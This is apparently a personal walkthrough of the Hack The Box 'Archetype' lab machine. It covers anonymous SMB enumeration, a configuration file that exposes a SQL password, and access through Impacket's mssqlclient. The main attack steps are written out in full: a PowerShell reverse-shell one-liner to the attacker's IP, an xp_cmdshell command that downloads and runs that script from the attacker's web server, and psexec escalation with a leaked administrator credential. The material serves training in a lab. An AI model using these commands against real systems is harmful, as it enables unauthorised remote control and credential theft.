I know hackthebox about a year now but I am not active on this site. Have an early wake-up call I am not improving my skills these past months. I already pwned the Archetype.
Note: Upper right side their an Tutorials with all these boxes. But I find it lack at some point. That’s why I will make a walkthroughs with these boxes (Not all of them; but some of them).
First of all; connect to your VPN (Virtual Private Network) provided by the hackthebox and please see the commands below.
ch3@ch3: ls
-This command let you enumerate the files / folders in your machine. Once you located your .ovpn run the command below.
ch3@ch3: openvpn [NameOfYourVPN]
-Then click enter; wait for at least 15 seconds to process the command. Once done you will see the Initialization Sequence Completed. You can now proceed to the hackthebox platform.
Walkthrough Archetype:
Name: Archetype
OS: Windows
IP: 10.10.10.27
Enumeration is the key: Let us use the NMAP (Network Mapper) I used this format since I am not familiar with the NMAP commands yet you can use certain parameters if you want as long it can give you a meaningful / penetrating insightful to the machine.
We can now see the open ports and services. We can attack the SMB (Service Message Block at Port 445) and Microsoft SQL Server 2017. Let us take a look with SMB and Microsoft SQL Server.
Let us check the SMB for any anonymous file has been permitted which store configuration files / other sensitive information.
smbclient -N -L \\\\\10.10.10.27\\backups
There is a share name called backups. Let’s take a peak what’s inside.
A configuration name “prod.dtsConfig” Let’s us get what’s the configuration settings. Enter the command below to get the file.
get prod.dtsConfig
Locate the file “prod.dtsConfig” in your machine. To view what’s inside of this file. It’s configuration settings. Enter the command below.
cat prod.dtsConfig
DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy=”…” GeneratedFromPackageName=”…” GeneratedFromPackageID=”…” GeneratedDate=”20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType=”Property” Path=”\Package.Connections[Destination].Properties[ConnectionString]” ValueType=”String”>
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
As you can see the configuration settings it does have a value string called ID=ARCHETYPE\sql_svc. We can use a tool name Impacket; download it here (https://github.com/SecureAuthCorp/impacket).
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1–3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
Download the tool using the terminal (It will depends in your device linux distro. Enter the command below) in this walkthrough since I am using the debian-based.
git clone https://github.com/SecureAuthCorp/impacket.git
Copy paste the https link under the capital HTTPS.
Once done installing update your kali linux and python library. See the screenshots below.
When all requirements are done. You can now proceed with the tool Impacket. Go to Impacket directory and examples. The python is under on examples directory.
python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Password will require for this. And the password is indicated on the DTSConfiguration.
It’s okay not to succeed at first try it again and if that’s not work few times. Check the command you inputted and the password as well. Error may vary either of this one.
The IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. Check the sysadmin for the privileges.
“xp_cmdshell” is an extended stored procedure provided by Microsoft and stored in the master database. This host does not have an administrative privileges.
Let’s use another method to get a shell on this machine.
$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “# “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Change the IP address on the above (“10.x.x.x) to the IP you have, given by the hackthebox. To check what’s your IP assigned by the hackthebox. See the command used.
ifconfig tun0
Whatever IP is indicated on your inet (IPv4) that’s the IP you will use on your Powershell. Let us proceed to the next steps on this walkthrough.
Open a nano / vim to save the file. Please save as a powershell; see mine.
Open a mini web-server.
python3 -m http.server 80
-htb
Connection is established.
Open a netcat listener.
nc -lvnp 443
-HTB
Connection is established.
Enter the command provided but change the IP address that is assigned to you and use the powershell you’ve created.
xp_cmdshell “powershell “IEX(New-Object Net.WebClient).DownloadString(\”http://YourIPGivenByTheHTB/NameOfYourPowershell\");"
Once the sql established a connection check your netcat listener. Within the netcat, you can start to dig deeper in the machine.
Enter the entire command below to check the creds of Archetpe\backups.
type C:\Users\sql svc\AppData\Roamng\MicrosoftWindows\Powershell\PSReadLine\ConsoleHost history.txt
We can privilege escalate with the use of psexec. Please see the screenshot above where a leaked credential where found.
python3 psexec.py administrator@10.10.10.27
Then type the password under the leaked credential.
Finding directories and f iles with a command of dir (lists of directories and files on windows OS).
And lastly tpe the type root.txt. Good luck and I CONGRATULATE YOU for reaching out on this point.
